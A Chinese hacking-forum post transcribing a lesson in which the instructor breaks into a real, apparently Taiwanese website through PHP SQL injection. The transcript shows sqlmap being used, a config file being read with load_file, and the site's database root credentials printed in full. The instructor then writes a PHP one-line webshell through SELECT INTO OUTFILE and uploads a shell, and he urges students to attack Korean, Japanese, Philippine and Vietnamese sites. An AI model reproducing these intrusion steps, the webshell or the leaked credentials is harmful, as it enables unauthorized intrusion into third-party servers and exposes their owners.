HACK80

作者: admin
查看: 10427|回复: 56

主题标签Tag

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-25基于php参数开关的提权2017年中旬WEB渗透系列课程-25基于php参数开关的提权
社工库查询工具1.1修改版社工库查询工具1.1修改版
(公开课)SQLMAP第七课之Tamper插件使用(公开课)SQLMAP第七课之Tamper插件使用
论坛新版IOS及Android客户端内测论坛新版IOS及Android客户端内测
(公开课)SQLMAP第八课之file参数使用(公开课)SQLMAP第八课之file参数使用
2017年中旬WEB渗透系列课程-00前言2017年中旬WEB渗透系列课程-00前言
2017年中旬WEB渗透系列课程-24提权分类2017年中旬WEB渗透系列课程-24提权分类
小迪15期的视频教程小迪15期的视频教程
2017年中旬WEB渗透系列课程-27HASH提权2017年中旬WEB渗透系列课程-27HASH提权
2017年中旬WEB渗透系列课程-21webshell免杀相关问题2017年中旬WEB渗透系列课程-21webshell免杀相关问题

公开课第九节-通过一次渗透过程讲解PHP注入 第三部分

  [复制链接]
admin 发表于 2014-6-19 15:40:21 | 显示全部楼层 |阅读模式
查看: 10427|回复: 56

马上注册,加入HACK80!与我们一起交流。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
从此节课程开始,今后的课程将不采用长标题,转而采用短标题形式,更加直观!
本期课程主要内容:通过一次渗透过程讲解PHP注入 第三部分
捕获.PNG

视频长度:26:59
视频下载:
游客,如果您要查看本帖隐藏内容请回复

文字说明:
大家好,欢迎来到由HACK80为大家带来的大型公益培训系列教程。。
我是本系列课程的讲师。
我的QQ是1662534536
hack80官方地址是http://www.hack80.com


好的,欢迎回来。
刚才我们通过注入已经查询出后台的账号密码了,但是这个后台我看过,有点稍简陋。有fckeditor
这些不是现在要讲的,我以后会说的,我们接着本节课的主旨来说。
这节课说的是一些函数的使用。
因为我们有root权限,所以我们用sqlmap来把root的密码爆出,当然,注入点也可以。
看到了,已经爆出了,但是这个root的md5无法解出。我试过了
没法解出,那么既然是root权限,就直接通过读文件load_file函数就能读了。
我们来试试到底能不能读,需要hex编码
能读的。
我们是要找可能会存在root账号密码的文件
我草,路径可能读错了,,,有点乱。。
日他娘,终于读到了
define('XOOPS_DB_HOST', 'localhost');
define('XOOPS_DB_USER', 'root');
define('XOOPS_DB_PASS', 'g6Qy9R9L');
define('XOOPS_DB_NAME', 'worldpeace');
现在root在手了,phpmyadmin上写马就行了。
速度有点慢额
Can't create/write to file '/home/httpd/html/hack80.ph
意思是没有写入的权限
select '<?php eval($_POST[cmd])?>' into outfile '/home/httpd/html/hack80.php'
这句的意思是把一句话木马写进hack80.php这个文件中,那么
一般的有图片文件的文件夹可能会有写的权限,要不然管理员上传文件都传不了了。
我们找一个就行了
您的 SQL 语句已成功运行 ( 查询花费 0.0003 秒 )
已经写入了吧,我们看一下。
一片空白哦。
说明已经写入成功了,拿出菜刀
exp应该会有的吧,但是提权不是本文的内容,而且它还是内网,比较蛋疼
好了,至此shell已经拿到了,那么我们来分析一下哦。
其实,不用进入pma也能拿到的,通过注入点就行了。
我这里只是说一下通过pma拿的,下面演示注入点拿
就不写马了,写个phpinfo吧
草,这个字符型的注入点还弄不出来。
去他大爷的吧,演示sqlmap的吧,反正都一样,都能拿shell
看到没,写入成功了
the file has been successfully written
sqlmap file uploader
这是个上传文件。
可以上传任意文件的,把你的马传上去就行了。
还有一种sqlmap写马的。
随便找个目录,把你的马放进去。
然后
看到没,一片空白,写入成功了。
说下刚才那个注入点的问题,,,草,我也不知道什么原因。。一般有注入点了
用sqlmap直接一条龙就能拿shell,不用太麻烦,能拿shell的就是好方法。
然后我用的那个注入点写shell的,就是那个步骤,回头你们有机会实践一下吧

本次课程的站点,我是找的网上的,本来打算尽量不用网上的,
我自己已经写了个带有注入的php站点,
为什么要找网上的,是为了更直观, 更形象。
希望大家就不要再搞这个了
毕竟还是宝岛台湾的吗,哈哈。
没事儿去搞搞韩国啊,日本啊,菲律宾啊,越南啊这些傻比站点。
全力支持的哦。。。
好吧,马没删完。。。把自己的倒是删了。。

行了,这节课就到这里吧。
希望大家回去好好看看哦
我们的地址http://www.hack80.com
多去论坛讨论,自己日下了国外站点,或者学到了哪些知识,哪里不懂,都可以发在论坛上
好了,拜拜

mading 发表于 2014-6-20 00:22:57 | 显示全部楼层
lz辛苦了   
眷恋轮回 发表于 2014-6-20 12:30:24 | 显示全部楼层
楼主幸苦了!!!!!!!!!!!!!!!!!!!!
擦亮眼睛看星星 发表于 2014-6-20 13:33:53 | 显示全部楼层
很好的教程
my_enid 发表于 2014-6-20 17:39:48 | 显示全部楼层
每天学习一点,好东西
沉默 发表于 2014-6-20 21:22:29 | 显示全部楼层
看看先.................
mysoft 发表于 2014-6-20 21:34:04 | 显示全部楼层
回复什么好呢!唉,
dingshuitao 发表于 2014-6-20 22:29:12 | 显示全部楼层
楼主辛苦啦
harvey1109 发表于 2014-6-21 04:29:04 | 显示全部楼层
继续来学习
2Sr 发表于 2014-6-21 11:16:08 | 显示全部楼层
楼主威武  楼主淫荡
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2018-2-18 07:15 , Processed in 0.064979 second(s), 30 queries .

Powered by Discuz! X3.4 © 2001-2013 Comsenz Inc.